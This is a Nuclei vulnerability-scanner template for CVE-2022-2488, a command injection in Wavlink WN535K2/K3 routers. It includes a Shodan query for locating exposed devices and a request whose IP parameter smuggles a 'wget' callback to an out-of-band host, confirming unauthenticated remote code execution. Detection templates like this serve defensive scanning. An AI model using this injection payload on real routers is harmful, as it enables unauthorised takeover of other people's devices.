id: CVE-2022-2488

info:
  name: Wavlink Touchlist_sync.cgi - Remote Code Execution
  author: For3stCo1d
  severity: critical
  description: |
    A vulnerability was found in WAVLINK WN535K2 and WN535K3 and classified as critical. This issue affects some unknown processing of the file /cgi-bin/touchlist_sync.cgi. The manipulation of the argument IP leads to os command injection. The exploit has been disclosed to the public and may be used.
  reference:
    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488
    - https://vuldb.com/?id.204539
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-2488
    cwe-id: CWE-78
  metadata:
    shodan-query: http.title:"Wi-Fi APP Login"
    verified: "true"
  tags: cve,cve2022,iot,wavlink,router,rce,oast

requests:
  - raw:
      - |
        GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"

      - type: status
        status:
          - 500